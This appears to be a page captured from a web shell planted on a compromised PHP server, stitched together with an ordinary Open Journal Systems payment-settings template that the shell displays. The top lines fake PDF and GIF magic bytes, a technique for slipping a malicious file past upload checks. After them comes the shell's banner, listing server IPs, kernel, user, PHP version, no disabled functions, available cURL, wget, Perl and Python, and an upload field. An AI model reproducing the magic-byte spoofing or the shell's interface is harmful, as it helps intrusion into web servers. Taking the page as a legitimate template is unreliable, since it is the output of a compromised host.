%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/IntvJournal/templates/payments/ |
Upload File : |
{**
* templates/payments/payMethodSettingsForm.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Form to edit payment settings.
*
*}
{strip}
{assign var="pageTitle" value="manager.payment.paymentMethods"}
{include file="common/header.tpl"}
{/strip}
<ul class="menu">
<li><a href="{url op="payments"}">{translate key="manager.payment.options"}</a></li>
<li class="current"><a href="{url op="payMethodSettings"}">{translate key="manager.payment.paymentMethods"}</a></li>
<li><a href="{url op="viewPayments"}">{translate key="manager.payment.records"}</a></li>
</ul>
{include file="common/formErrors.tpl"}
<script type="text/javascript">
<!--
{literal}
function changePaymentMethod() {
document.getElementById('paymentSettingsForm').action="{/literal}{url|escape:"javascript" op="payMethodSettings" escape=false}{literal}";
document.getElementById('paymentSettingsForm').submit();
}
{/literal}
// -->
</script>
<form method="post" id="paymentSettingsForm" action="{url op="savePayMethodSettings"}">
<p>{translate key="manager.payment.paymentMethod.description"}</p>
<table width="100%" class="data">
<tr valign="top">
<td class="data" colspan="2">
{assign var=pluginIndex value=1}
<h4>{translate key="manager.payment.paymentMethods"}</h4>
{foreach from=$paymentMethodPlugins item=plugin}
<input type="radio" name="paymentMethodPluginName" id="paymentMethodPluginName-{$pluginIndex|escape}" value="{$plugin->getName()|escape}" onclick="changePaymentMethod();" {if $paymentMethodPluginName == $plugin->getName()}checked="checked" {/if}/> <label for="paymentMethodPluginName-{$pluginIndex|escape}">{$plugin->getDisplayName()|escape}</label><br/>
<p>{$plugin->getDescription()}</p>
{assign var=pluginIndex value=$pluginIndex+1}
{/foreach}
</td>
</tr>
{call_hook name="Template::Manager::Payment::displayPaymentSettingsForm" plugin=$paymentMethodPluginName}
</table>
<p><input type="submit" value="{translate key="common.save"}" class="button defaultButton" /> <input type="button" value="{translate key="common.cancel"}" class="button" onclick="document.location.href='{url page="manager"}'" /></p>
<p><span class="formRequired">{translate key="common.requiredField"}</span></p>
</form>
{include file="common/footer.tpl"}